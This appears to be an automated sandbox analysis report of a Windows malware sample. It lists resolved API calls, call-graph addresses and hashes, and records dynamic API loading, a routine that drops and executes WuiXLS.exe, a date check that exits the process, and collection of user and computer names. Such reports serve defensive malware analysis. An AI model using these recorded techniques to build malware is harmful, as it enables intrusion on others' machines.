40c740 19247->19248 19249 413150 lstrcpy 19248->19249 19250 40c749 19249->19250 19737 410d30 GetProcessHeap RtlAllocateHeap 19250->19737 19252 40c759 19253 413260 4 API calls 19252->19253 19254 40c769 19253->19254 19255 413150 lstrcpy 19254->19255 19256 40c772 19255->19256 19257 413260 4 API calls 19256->19257 19258 40c791 19257->19258 19259 413150 lstrcpy 19258->19259 19260 40c79a 19259->19260 19261 413260 4 API calls 19260->19261 19262 40c7bb 19261->19262 19263 413150 lstrcpy 19262->19263 19264 40c7c4 19263->19264 19741 4112a0 19264->19741 19267 4131d0 3 API calls 19268 40c7ee 19267->19268 19269 413150 lstrcpy 19268->19269 19270 40c7f7 19269->19270 19271 413260 4 API calls 19270->19271 19272 40c821 19271->19272 19273 413150 lstrcpy 19272->19273 19274 40c82a 19273->19274 19275 413260 4 API calls 19274->19275 19276 40c84a 19275->19276 19277 413150 lstrcpy 19276->19277 19278 40c853 19277->19278 19279 413260 4 API calls 19278->19279 19280 40c872 19279->19280 19281 413150 lstrcpy 19280->19281 19282 40c87b 19281->19282 19747 410dd0 19282->19747 19284 40c892 19285 4131d0 3 API calls 19284->19285 19286 40c8a5 19285->19286 19287 413150 lstrcpy 19286->19287 19288 40c8ae 19287->19288 19289 413260 4 API calls 19288->19289 19290 40c8da 19289->19290 19291 413150 lstrcpy 19290->19291 19292 40c8e3 19291->19292 19293 413260 4 API calls 19292->19293 19294 40c902 19293->19294 19295 413150 lstrcpy 19294->19295 19296 40c90b 19295->19296 19297 413260 4 API calls 19296->19297 19298 40c92c 19297->19298 19299 413150 lstrcpy 19298->19299 19300 40c935 19299->19300 19301 413260 4 API calls 19300->19301 19302 40c954 19301->19302 19303 413150 lstrcpy 19302->19303 19304 40c95d 19303->19304 19305 413260 4 API calls 19304->19305 19306 40c97e 19305->19306 19307 413150 lstrcpy 19306->19307 19308 40c987 19307->19308 19755 410eb0 19308->19755 19310 40c9a3 19311 4131d0 3 API calls 19310->19311 19312 40c9b6 19311->19312 19313 413150 lstrcpy 19312->19313 19314 40c9bf 19313->19314 19315 413260 4 API calls 19314->19315 19316 40c9e9 19315->19316 19317 413150 lstrcpy 19316->19317 19318 40c9f2 19317->19318 19319 413260 4 API calls 19318->19319 19320 40ca13 19319->19320 19321 413150 lstrcpy 19320->19321 19322 40ca1c 19321->19322 19323 410eb0 7 API calls 19322->19323 19324 40ca38 19323->19324 19325 4131d0 3 API calls 19324->19325 19326 40ca4b 19325->19326 19327 413150 lstrcpy 19326->19327 19328 40ca54 19327->19328 19329 413260 4 API calls 19328->19329 19330 40ca7e 19329->19330 19331 413150 lstrcpy 19330->19331 19332 40ca87 19331->19332 19333 413260 4 API calls 19332->19333 19334 40caa6 19333->19334 19335 413150 lstrcpy 19334->19335 19336 40caaf 19335->19336 19337 413260 4 API calls 19336->19337 19338 40cad0 19337->19338 19339 413150 lstrcpy 19338->19339 19340 40cad9 19339->19340 19784 4111b0 19340->19784 19342 40caf0 19343 4131d0 3 API calls 19342->19343 19344 40cb03 19343->19344 19345 413150 lstrcpy 19344->19345 19346 40cb0c 19345->19346 19347 40cb2a lstrlen 19346->19347 19348 40cb3a 19347->19348 19349 412ff0 lstrcpy 19348->19349 19350 40cb4c 19349->19350 19351 401950 lstrcpy 19350->19351 19352 40cb5a 19351->19352 19792 404210 19352->19792 19354 40cb66 19354->17943 19356 404100 19355->19356 19356->17947 19358 4130d0 2 API calls 19357->19358 19359 40b145 19358->19359 19956 405fc0 19359->19956 19361 40b152 19362 40b38e 19361->19362 19365 40b173 19361->19365 19363 40b398 lstrlen 19362->19363 19364 40b3aa 19363->19364 19366 413050 lstrcpy 19364->19366 19368 413050 lstrcpy 19365->19368 19373 40b20e 19365->19373 19367 40b3b9 19366->19367 19369 401950 lstrcpy 19367->19369 19370 40b1af 19368->19370 19371 40b3c7 19369->19371 19372 401950 lstrcpy 19370->19372 19374 404210 26 API calls 19371->19374 19375 40b1dd 19372->19375 19377 412ff0 lstrcpy 19373->19377 19409 40b30d 19373->19409 19383 40b3d0 19374->19383 19376 413050 lstrcpy 19375->19376 19378 40b1f1 19376->19378 19380 40b249 19377->19380 19379 413050 lstrcpy 19378->19379 19381 40b209 19379->19381 19382 413260 4 API calls 19380->19382 19959 40aac0 19381->19959 19385 40b271 19382->19385 19383->17951 19387 4131d0 3 API calls 19385->19387 19386 40b386 19386->17951 19389 40b278 19387->19389 19388 401950 lstrcpy 19391 40b355 19388->19391 19390 413260 4 API calls 19389->19390 19392 40b27f 19390->19392 19393 413050 lstrcpy 19391->19393 19395 413150 lstrcpy 19392->19395 19394 40b369 19393->19394 19396 413050 lstrcpy 19394->19396 19399 40b288 19395->19399 19397 40b381 19396->19397 20071 40afb0 19397->20071 19400 401950 lstrcpy 19399->19400 19401 40b2ce 19400->19401 19402 413050 lstrcpy 19401->19402 19403 40b2dc 19402->19403 19404 413050 lstrcpy 19403->19404 19405 40b2f0 19404->19405 19406 413050 lstrcpy 19405->19406 19407 40b308 19406->19407 20010 40ad00 19407->20010 19409->19386 19409->19388 20767 413380 19410->20767 19412 40b6e7 strtok_s 19415 40b6f4 19412->19415 19413 40b7df 19413->17959 19414 40b7bb strtok_s 19414->19415 19415->19413 19415->19414 19416 4130d0 lstrlen lstrcpy 19415->19416 19416->19415 19418 401a1f 19417->19418 19419 401a9a 19418->19419 19420 401950 lstrcpy 19418->19420 19421 413050 lstrcpy 19418->19421 20768 401250 19418->20768 19419->17963 19420->19418 19421->19418 20812 413380 19423->20812 19425 40b836 strtok_s 19429 40b86b 19425->19429 19426 40bc82 19426->17971 19427 40bc4f strtok_s 19427->19429 19428 4130d0 lstrlen lstrcpy 19428->19429 19429->19426 19429->19427 19429->19428 19430 40b8fd lstrcpy 19429->19430 19431 411850 lstrcpy 19430->19431 19664 4038d6 19663->19664 19691 411370 malloc 19664->19691 19666 4038ff 19692 411370 malloc 19666->19692 19668 403915 19693 411370 malloc 19668->19693 19670 40392b 19671 403945 lstrlen 19670->19671 19672 403955 19671->19672 19672->18722 19674 412ff0 lstrcpy 19673->19674 19675 4115e4 19674->19675 19676 412ff0 lstrcpy 19675->19676 19677 4115f2 GetSystemTime 19676->19677 19679 411609 19677->19679 19678 413050 lstrcpy 19680 41166c 19678->19680 19679->19678 19680->18734 19682 4131e1 19681->19682 19683 413238 19682->19683 19686 413218 lstrcpy lstrcat 19682->19686 19684 413050 lstrcpy 19683->19684 19685 413244 19684->19685 19685->18737 19686->19683 19688 4061e9 19687->19688 19689 403ffe 19687->19689 19688->19689 19690 406204 CryptStringToBinaryA 19688->19690 19689->18741 19689->18745 19690->19689 19691->19666 19692->19668 19693->19670 19694->18988 19695->18990 19696->18992 19697->18994 19698->18998 19699->19004 19700->19011 19702 40c0ee 19701->19702 19702->19075 19704 40c169 19703->19704 19704->19089 19705->19102 19707 40c2d9 19706->19707 19707->19131 19709 40c354 19708->19709 19709->19145 19711 412ff0 lstrcpy 19710->19711 19717 410959 19711->19717 19712 410aa5 19713 413050 lstrcpy 19712->19713 19714 410ac4 19713->19714 19714->19170 19715 413260 lstrcpy lstrlen lstrcpy lstrcat 19715->19717 19716 413150 lstrcpy 19716->19717 19717->19712 19717->19715 19717->19716 19719 411efa 19718->19719 19720 411f25 19719->19720 19722 411f1b CloseHandle 19719->19722 19721 412ff0 lstrcpy 19720->19721 19723 40c561 19721->19723 19722->19720 19723->19197 19725 40c5e9 19724->19725 19725->19211 19733 410c06 19726->19733 19727 410c7b 19728 411460 GetProcessHeap 19727->19728 19730 410c6f 19728->19730 19732 40c664 19730->19732 19734 411460 GetProcessHeap 19730->19734 19732->19225 19733->19727 19733->19730 19733->19732 19942 411460 19733->19942 19945 411480 GetProcessHeap RtlAllocateHeap 19733->19945 19734->19732 19736 40c6df 19735->19736 19736->19239 19738 411400 19737->19738 19739 410d5a GlobalMemoryStatusEx 19738->19739 19740 410d70 __aulldiv 19739->19740 19740->19252 19742 4112b8 GetProcessHeap RtlAllocateHeap 19741->19742 19744 411313 19742->19744 19745 412ff0 lstrcpy 19744->19745 19746 40c7db 19745->19746 19746->19267 19748 412ff0 lstrcpy 19747->19748 19750 410de6 19748->19750 19749 410e20 19752 413050 lstrcpy 19749->19752 19750->19749 19751 413260 lstrcpy lstrlen lstrcpy lstrcat 19750->19751 19754 413150 lstrcpy 19750->19754 19751->19750 19753 410e99 19752->19753 19753->19284 19754->19750 19756 412ff0 lstrcpy 19755->19756 19757 410ec9 19756->19757 19758 410f1b 19757->19758 19763 410f3d 19757->19763 19759 413050 lstrcpy 19758->19759 19762 410f2a 19759->19762 19760 411163 19761 413050 lstrcpy 19760->19761 19761->19762 19762->19310 19763->19760 19764 410ff2 19763->19764 19765 41102e 19763->19765 19769 413050 lstrcpy 19764->19769 19765->19760 19766 411067 lstrlen 19765->19766 19766->19760 19767 41107d 19766->19767 19768 413260 4 API calls 19767->19768 19770 411094 19768->19770 19769->19762 19771 413150 lstrcpy 19770->19771 19772 4110a0 19771->19772 19773 413260 4 API calls 19772->19773 19774 4110c4 19773->19774 19775 413150 lstrcpy 19774->19775 19776 4110d0 19775->19776 19776->19760 19777 413260 4 API calls 19776->19777 19778 411127 19777->19778 19779 413150 lstrcpy 19778->19779 19780 411133 19779->19780 19781 413260 4 API calls 19780->19781 19782 411157 19781->19782 19783 413150 lstrcpy 19782->19783 19783->19760 19785 412ff0 lstrcpy 19784->19785 19790 4111c9 19785->19790 19786 41126a CloseHandle 19787 413050 lstrcpy 19786->19787 19788 411283 19787->19788 19788->19342 19789 413260 lstrcpy lstrlen lstrcpy lstrcat 19789->19790 19790->19786 19790->19789 19791 413150 lstrcpy 19790->19791 19791->19790 19793 413050 lstrcpy 19792->19793 19794 404229 19793->19794 19795 4038c0 2 API calls 19794->19795 19796 404235 19795->19796 19946 411910 19796->19946 19798 40428e 19799 404299 lstrlen 19798->19799 19800 4042a9 19799->19800 19801 411910 2 API calls 19800->19801 19802 4042ba 19801->19802 19803 412ff0 lstrcpy 19802->19803 19804 4042cd 19803->19804 19805 412ff0 lstrcpy 19804->19805 19806 4042da 19805->19806 19807 412ff0 lstrcpy 19806->19807 19808 4042e7 19807->19808 19809 412ff0 lstrcpy 19808->19809 19810 4042f4 19809->19810 19811 412ff0 lstrcpy 19810->19811 19812 404301 19811->19812 19813 4115d0 3 API calls 19812->19813 19821 40496f 19812->19821 19814 404352 19813->19814 19815 4131d0 3 API calls 19814->19815 19816 404365 19815->19816 19817 413150 lstrcpy 19816->19817 19818 40436e 19817->19818 19819 413260 4 API calls 19818->19819 19820 4043af 19819->19820 19822 4131d0 3 API calls 19820->19822 19824 413050 lstrcpy 19821->19824 19823 4043b6 19822->19823 19825 413260 4 API calls 19823->19825 19832 404a17 19824->19832 19826 4043bd 19825->19826 19827 413150 lstrcpy 19826->19827 19828 4043c6 19827->19828 19829 413260 4 API calls 19828->19829 19830 404407 19829->19830 19831 4131d0 3 API calls 19830->19831 19833 40440e 19831->19833 19832->19354 19834 413150 lstrcpy 19833->19834 19835 404417 19834->19835 19835->19821 19836 413260 4 API calls 19835->19836 19837 4044cf 19836->19837 19838 413150 lstrcpy 19837->19838 19839 4044d8 19838->19839 19840 4131d0 3 API calls 19839->19840 19841 4044f6 19840->19841 19842 413150 lstrcpy 19841->19842 19843 4044ff 19842->19843 19844 413260 4 API calls 19843->19844 19845 40451e 19844->19845 19846 413150 lstrcpy 19845->19846 19847 404527 19846->19847 19848 413260 4 API calls 19847->19848 19849 404548 19848->19849 19850 413150 lstrcpy 19849->19850 19851 404551 19850->19851 19852 413260 4 API calls 19851->19852 19853 404572 19852->19853 19854 413150 lstrcpy 19853->19854 19855 40457b 19854->19855 19856 413260 4 API calls 19855->19856 19857 40459a 19856->19857 19858 413150 lstrcpy 19857->19858 19859 4045a3 19858->19859 19860 4131d0 3 API calls 19859->19860 19861 4045c1 19860->19861 19862 413150 lstrcpy 19861->19862 19863 4045ca 19862->19863 19864 413260 4 API calls 19863->19864 19865 4045e9 19864->19865 19866 413150 lstrcpy 19865->19866 19867 4045f2 19866->19867 19868 413260 4 API calls 19867->19868 19869 404611 19868->19869 19870 413150 lstrcpy 19869->19870 19871 40461a 19870->19871 19872 4131d0 3 API calls 19871->19872 19873 404638 19872->19873 19874 413150 lstrcpy 19873->19874 19875 404641 19874->19875 19943 411469 GetProcessHeap 19942->19943 19944 41147c 19942->19944 19943->19944 19944->19733 19945->19733 19947 411919 19946->19947 19948 41191d 19946->19948 19947->19798 19948->19947 19949 41193e GetProcessHeap RtlAllocateHeap 19948->19949 19949->19947 20114 405f70 19956->20114 19958 405fd1 19958->19361 19960 412ff0 lstrcpy 19959->19960 19961 40aad6 19960->19961 20159 411850 19961->20159 19964 4131d0 3 API calls 19965 40aaff 19964->19965 19966 413150 lstrcpy 19965->19966 19967 40ab08 19966->19967 19968 4131d0 3 API calls 19967->19968 19969 40ab28 19968->19969 19970 413150 lstrcpy 19969->19970 19971 40ab31 19970->19971 19972 412ff0 lstrcpy 19971->19972 19973 40ab46 19972->19973 19974 4131d0 3 API calls 19973->19974 19975 40ab56 19974->19975 19976 413150 lstrcpy 19975->19976 19977 40ab5f 19976->19977 19978 413260 4 API calls 19977->19978 19979 40ab82 19978->19979 19980 413260 4 API calls 19979->19980 19981 40ab89 19980->19981 20011 412ff0 lstrcpy 20010->20011 20012 40ad16 20011->20012 20013 412ff0 lstrcpy 20012->20013 20014 40ad23 20013->20014 20015 411850 lstrcpy 20014->20015 20016 40ad3c 20015->20016 20017 4131d0 3 API calls 20016->20017 20018 40ad4c 20017->20018 20019 413150 lstrcpy 20018->20019 20020 40ad55 20019->20020 20021 4131d0 3 API calls 20020->20021 20022 40ad7d 20021->20022 20023 4131d0 3 API calls 20022->20023 20072 412ff0 lstrcpy 20071->20072 20073 40afc3 20072->20073 20074 412ff0 lstrcpy 20073->20074 20075 40afd0 20074->20075 20076 411850 lstrcpy 20075->20076 20077 40afdb 20076->20077 20078 4131d0 3 API calls 20077->20078 20079 40afeb 20078->20079 20080 413150 lstrcpy 20079->20080 20081 40aff4 20080->20081 20082 4131d0 3 API calls 20081->20082 20083 40b014 20082->20083 20084 413150 lstrcpy 20083->20084 20085 40b01d 20084->20085 20086 4131d0 3 API calls 20085->20086 20087 40b035 20086->20087 20088 413150 lstrcpy 20087->20088 20089 40b03e 20088->20089 20090 413260 4 API calls 20089->20090 20091 40b061 20090->20091 20092 413260 4 API calls 20091->20092 20093 40b068 20092->20093 20094 413150 lstrcpy 20093->20094 20095 40b071 20094->20095 20119 411370 malloc 20114->20119 20116 405f7d 20120 405df0 20116->20120 20118 405f9c 20118->19958 20119->20116 20123 405b90 20120->20123 20124 405bb3 20123->20124 20136 405ba9 20123->20136 20137 405380 20124->20137 20128 405c0e 20128->20136 20147 405800 20128->20147 20130 405c7a 20131 405d36 VirtualFree 20130->20131 20133 405d47 20130->20133 20130->20136 20131->20133 20132 405d91 20134 411460 GetProcessHeap 20132->20134 20132->20136 20133->20132 20135 411460 GetProcessHeap 20133->20135 20134->20136 20135->20132 20136->20118 20138 405392 20137->20138 20140 405399 20138->20140 20157 411480 GetProcessHeap RtlAllocateHeap 20138->20157 20140->20136 20141 4054b0 20140->20141 20146 4054df VirtualAlloc 20141->20146 20143 405580 20144 405593 VirtualAlloc 20143->20144 20145 40558c 20143->20145 20144->20145 20145->20128 20146->20143 20146->20145 20148 405819 20147->20148 20151 405825 20147->20151 20149 405859 LoadLibraryA 20148->20149 20148->20151 20150 405882 20149->20150 20149->20151 20156 40592c 20150->20156 20158 411480 GetProcessHeap RtlAllocateHeap 20150->20158 20151->20130 20153 4059f4 GetProcAddress 20153->20151 20153->20156 20154 4058db 20154->20151 20155 411460 GetProcessHeap 20154->20155 20155->20156 20156->20151 20156->20153 20157->20140 20158->20154 20160 41186a 20159->20160 20161 412ff0 lstrcpy 20160->20161 20162 40aaef 20161->20162 20162->19964 20767->19412 20769 412ff0 lstrcpy 20768->20769 20770 401266 20769->20770 20771 412ff0 lstrcpy 20770->20771 20772 401273 20771->20772 20773 411850 lstrcpy 20772->20773 20774 401281 20773->20774 20775 4131d0 3 API calls 20774->20775 20776 401294 20775->20776 20777 413150 lstrcpy 20776->20777 20778 40129d 20777->20778 20779 401342 20778->20779 20780 4012bd 20778->20780 20782 4131d0 3 API calls 20779->20782 20781 4131d0 3 API calls 20780->20781 20812->19425 21046 7ba000 21048 7ba044 GetPEB 21046->21048 21049 7ba077 CreateFileA 21048->21049 21051 7ba265 21049->21051 21052 7ba22d 21049->21052 21053 7ba246 WriteFile 21052->21053 21054 7ba244 21052->21054 21055 7ba255 FindCloseChangeNotification WinExec 21053->21055 21054->21055 21055->21051

                                          Executed Functions

                                          Function 00412180 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetProcAddress.KERNEL32(75550000,00880DD0), ref: 004121C1
                                          • GetProcAddress.KERNEL32(75550000,00880E08), ref: 004121DA
                                          • GetProcAddress.KERNEL32(75550000,00880E38), ref: 004121F2
                                          • GetProcAddress.KERNEL32(75550000,00880E70), ref: 0041220A
                                          • GetProcAddress.KERNEL32(75550000,00880EA8), ref: 00412223
                                          • GetProcAddress.KERNEL32(75550000,00880EE0), ref: 0041223B
                                          • GetProcAddress.KERNEL32(75550000,00880F08), ref: 00412253
                                          • GetProcAddress.KERNEL32(75550000,00880F50), ref: 0041226C
                                          • GetProcAddress.KERNEL32(75550000,00880F90), ref: 00412284
                                          • GetProcAddress.KERNEL32(75550000,00880FC8), ref: 0041229C
                                          • GetProcAddress.KERNEL32(75550000,00881000), ref: 004122B5
                                          • GetProcAddress.KERNEL32(75550000,00881038), ref: 004122CD
                                          • GetProcAddress.KERNEL32(75550000,008804B0), ref: 004122E5
                                          • GetProcAddress.KERNEL32(75550000,008804F0), ref: 004122FE
                                          • GetProcAddress.KERNEL32(75550000,00881270), ref: 00412316
                                          • GetProcAddress.KERNEL32(75550000,00881298), ref: 0041232E
                                          • GetProcAddress.KERNEL32(75550000,008812C8), ref: 00412347
                                          • GetProcAddress.KERNEL32(75550000,00880510), ref: 0041235F
                                          • GetProcAddress.KERNEL32(75550000,00880538), ref: 00412377
                                          • GetProcAddress.KERNEL32(75550000,00880570), ref: 00412390
                                          • GetProcAddress.KERNEL32(75550000,008857F0), ref: 004123A8
                                          • LoadLibraryA.KERNEL32(00885828,?,00410440), ref: 004123BA
                                          • LoadLibraryA.KERNEL32(00880598,?,00410440), ref: 004123CB
                                          • LoadLibraryA.KERNEL32(00885850,?,00410440), ref: 004123DD
                                          • LoadLibraryA.KERNELBASE(00885878,?,00410440), ref: 004123EF
                                          • LoadLibraryA.KERNEL32(008858A0,?,00410440), ref: 00412400
                                          • GetProcAddress.KERNEL32(75670000,008858C0), ref: 00412422
                                          • GetProcAddress.KERNEL32(75750000,008858E8), ref: 00412443
                                          • GetProcAddress.KERNEL32(75750000,00885908), ref: 0041245B
                                          • GetProcAddress.KERNEL32(76BE0000,00885930), ref: 0041247D
                                          • GetProcAddress.KERNEL32(759D0000,00885950), ref: 0041249E
                                          • GetProcAddress.KERNEL32(773F0000,00885988), ref: 004124BF
                                          • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 004124D6
                                          Strings
                                          • NtQueryInformationProcess, xrefs: 004124CA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: NtQueryInformationProcess
                                          • API String ID: 2238633743-2781105232
                                          • Opcode ID: a6446af475f856057040de3f9c45a65888bee7be2fd0af68c1fc8b12d5e42eef
                                          • Instruction ID: 2b855f960e21fd0b6a67d09d83690fbde116cffe07640de17fe385095ce8f71f
                                          • Opcode Fuzzy Hash: a6446af475f856057040de3f9c45a65888bee7be2fd0af68c1fc8b12d5e42eef
                                          • Instruction Fuzzy Hash: 21A12BB55102409FC384DFA9EC88ADA77EBE78D701768E61BEA09C36A0DE359841CF54
                                          Function 007BA044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171fileprocessCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 102 7ba044-7ba074 GetPEB 103 7ba077-7ba09a 102->103 104 7ba09d-7ba0a0 103->104 105 7ba1ee-7ba22b CreateFileA 104->105 106 7ba0a6-7ba0bc 104->106 126 7ba22d-7ba230 105->126 127 7ba265-7ba269 105->127 107 7ba0be-7ba0c5 106->107 108 7ba110-7ba116 106->108 107->108 112 7ba0c7-7ba0ce 107->112 110 7ba129-7ba12f 108->110 111 7ba118-7ba11f 108->111 114 7ba148-7ba14e 110->114 115 7ba131-7ba138 110->115 111->110 113 7ba121-7ba124 111->113 112->108 116 7ba0d0-7ba0d7 112->116 118 7ba1bb-7ba1c0 113->118 120 7ba150-7ba157 114->120 121 7ba167-7ba16f 114->121 115->114 119 7ba13a-7ba141 115->119 116->108 122 7ba0d9-7ba0dd 116->122 129 7ba1c2-7ba1c5 118->129 130 7ba1e0-7ba1e9 118->130 119->114 128 7ba143-7ba146 119->128 120->121 131 7ba159-7ba160 120->131 123 7ba188-7ba18e 121->123 124 7ba171-7ba178 121->124 122->108 125 7ba0df-7ba0e3 122->125 134 7ba190-7ba197 123->134 135 7ba1a7-7ba1ad 123->135 124->123 132 7ba17a-7ba181 124->132 125->118 133 7ba0e9-7ba10b 125->133 136 7ba232-7ba238 126->136 128->118 129->130 137 7ba1c7-7ba1ca 129->137 130->104 131->121 138 7ba162-7ba165 131->138 132->123 139 7ba183-7ba186 132->139 133->103 134->135 140 7ba199-7ba1a0 134->140 135->118 141 7ba1af-7ba1b6 135->141 142 7ba23a-7ba242 136->142 143 7ba246-7ba252 WriteFile 136->143 137->130 144 7ba1cc-7ba1cf 137->144 138->118 139->118 140->135 146 7ba1a2-7ba1a5 140->146 141->118 147 7ba1b8 141->147 142->136 148 7ba244 142->148 149 7ba255-7ba262 FindCloseChangeNotification WinExec 143->149 144->130 150 7ba1d1-7ba1d4 144->150 146->118 147->118 148->149 149->127 150->130 151 7ba1d6-7ba1d9 150->151 151->130 152 7ba1db-7ba1de 151->152 152->105 152->130
                                          APIs
                                          • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007BA223
                                          • WriteFile.KERNELBASE(00000000,FFC4DFFC,00003E00,?,00000000), ref: 007BA252
                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 007BA256
                                          • WinExec.KERNEL32(?,00000005), ref: 007BA262
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511336437.00000000007BA000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BA000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ba000_7Y18r(193).jbxd
                                          Similarity
                                          • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                          • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$WuiXLS.exe$athA$catA$dleA$el32$lstr$odul
                                          • API String ID: 2234911746-2764548048
                                          • Opcode ID: 86c1030d4f9e2b8ea241b1d992b15d5e3375bb5488e3fb8d4b65644e615d70b5
                                          • Instruction ID: a59056b2508f6d270b4221048e903345f4b06a29b703aa9d08c8a21bc38b8235
                                          • Opcode Fuzzy Hash: 86c1030d4f9e2b8ea241b1d992b15d5e3375bb5488e3fb8d4b65644e615d70b5
                                          • Instruction Fuzzy Hash: 85612874D0121DEBCF64DF98C984BEDB7B4BF54315F2482AAE405AB241C3789E81CB92
                                          Function 00410360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 298 410360-41040c GetSystemTime call 410260 call 413380 sscanf call 4130b0 SystemTimeToFileTime * 2 305 410420-410423 298->305 306 41040e 298->306 307 410410-410416 306->307 308 410418-41041a ExitProcess 306->308 307->305 307->308
                                          APIs
                                          • GetSystemTime.KERNEL32(4HA,?,?,00410562,00000000,?,008859C8,?,00414834,?,00000000,?), ref: 004103AC
                                          • sscanf.NTDLL ref: 004103D9
                                          • SystemTimeToFileTime.KERNEL32(4HA,00000000,?,?,?,?,?,?,?,?,?,?,?,008859C8,?,00414834), ref: 004103F2
                                          • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,008859C8,?,00414834), ref: 00410400
                                          • ExitProcess.KERNEL32 ref: 0041041A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID: 4HA
                                          • API String ID: 2533653975-3847757909
                                          • Opcode ID: dece3023bcda19b2d979622ffeb509d4e92cd5aaab2d93c02f90c0a348cde40b
                                          • Instruction ID: 38bcd1f9b3be50fdaf38e9a9edd1f3871f0095c834be273fdbbfa22a262d8c3d
                                          • Opcode Fuzzy Hash: dece3023bcda19b2d979622ffeb509d4e92cd5aaab2d93c02f90c0a348cde40b
                                          • Instruction Fuzzy Hash: 7A21EAB5D14208AFCB04EFE4E845AEEB7B6FF48300F04856EE506A3250EB345648CB68
                                          Function 004107D0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 324 4107d0-410804 GetProcessHeap RtlAllocateHeap GetComputerNameA 325 410806-41080b 324->325 326 41080f 324->326 327 410812-410815 325->327 326->327
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,0041047C,00414682), ref: 004107DD
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004107E4
                                          • GetComputerNameA.KERNEL32(?,00000104), ref: 004107FC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateComputerNameProcess
                                          • String ID:
                                          • API String ID: 1664310425-0
                                          • Opcode ID: 480c2fa70fa46ef749b0ad9a2cea2b489044561edb8350ecda8cf0f58b79bf2e
                                          • Instruction ID: 6ad3a43f835fa594ef2b668d6339a37c016d9136f00cfcf8885baffc72510f62
                                          • Opcode Fuzzy Hash: 480c2fa70fa46ef749b0ad9a2cea2b489044561edb8350ecda8cf0f58b79bf2e
                                          • Instruction Fuzzy Hash: 42E048B4904208FFD700EFE4DD49BDD7BBDEB04301F148056EA05D3280DBB49A849755
                                          Function 00410790 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 333 410790-4107c8 GetProcessHeap RtlAllocateHeap GetUserNameA
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,00401157,008859E0,0041047C,00414682), ref: 0041079D
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004107A4
                                          • GetUserNameA.ADVAPI32(?,00000104), ref: 004107BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateNameProcessUser
                                          • String ID:
                                          • API String ID: 1296208442-0
                                          • Opcode ID: 937e87e3d1343579e2890d02c50287dfd1430cf33c95467ffc1631912f7c9db2
                                          • Instruction ID: 62a3c386001e156eb1dd6fb720cf38bb7be8a63b6e0cfa00a5a814fc280f9594
                                          • Opcode Fuzzy Hash: 937e87e3d1343579e2890d02c50287dfd1430cf33c95467ffc1631912f7c9db2
                                          • Instruction Fuzzy Hash: ABE0E6B594020CBFC740DFE4DD49ACDBBBDEB08301F144196EA45D3290DA7056448B51
                                          Function 008E5D77 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
